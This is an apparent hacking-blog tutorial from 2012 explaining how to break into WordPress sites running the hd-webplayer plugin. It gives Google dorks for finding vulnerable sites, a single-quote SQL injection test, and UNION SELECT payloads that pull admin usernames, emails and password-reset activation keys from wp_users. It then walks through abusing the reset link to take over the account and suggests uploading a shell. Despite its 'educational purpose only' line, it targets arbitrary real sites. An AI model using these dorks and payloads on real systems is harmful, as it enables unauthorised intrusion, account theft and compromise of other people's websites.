*Wild Wings Hackers*

|Hacks|Crack|Tips |Tricks|Cracks |Programs|Tutorials |Movies|Games|

Breaking

Friday, October 19, 2012

Home / Website hacking / Hack WordPress Website Using SQL

Hack WordPress Website Using SQL

by on in

Hello Friends Chinmoy Here And Today I am Going To Tell You Hack WordPress Website Using SQL.

I have posted show many tutorials on web hacking and sql so today i am going post on WordPress...

____________________________
Title :- Hack WordPress Website Using SQL

Difficult Level :- Easy!

This Tutorial Is For Educational Purpose Only.
____________________________

Video Tutorial will upload soon.
1. Find an vulnerable page by Google dorks:

Google Dorks:

Dork I (config.php)
inurl:"/wp-content/plugins/hd-webplayer/config.php?id="

Dork II(playlist.php)
inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="

Dork III (General):
inurl:"/wp-content/plugins/hd-webplayer/"
2. You will found many site vulnerable to this choose one of them and see is it working on it as most of them are not working due to security reasons.
You will find site address like this http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3

Now check is this URL is vulnerable to SQLi by adding [ ' ] after URL and if the test disappear then it is vulnerable to SQLi and you may proceed http://www.website.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3'
When you open the site you will see something like this : 
Click On The Image To Make It Large.


3.We will not demonstrate SQLi here simply we want admin username and e-mail so will inject this code after URL find by you:
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
Now if it works then you will find all username and e-mail of all the Users in the XML code above shown.Then go to Login page of the site and wordpress site login page usually is here
http://www.site.com/wp-login.php
Now enter the Username and click on "Lost your password"When the next page will open enter either Username or e-mail in the field like we entered an e-mail
 Then it will show you that "check your e-mail for the conformation Link"[Image: regionng.png]


 Now we need "activation key" So go again to this URL
http://www. website .com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
and replace " UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users-- "
with  " UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users-- "
Now you will get Username and activation key so we just go for reset it Go to : www.site.com/wp-login.php?action=rp&key=resetkey&login=username
NOTE: Replace key= & login= When new link will open For new passwordEnter the new password and all done you got access in the site Now You can Upload Your shell on site and edit the template of the site to see this step refer to video plz
ANY DOUBT FEEL FREE TO COMMENT..........

Author Image

About Anonymous
Soratemplates is a blogger resources site is a provider of high quality blogger template with premium looking layout and robust design. The main mission of templatesyard is to provide the best quality blogger templates.

Related Posts:
By -
Labels:

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)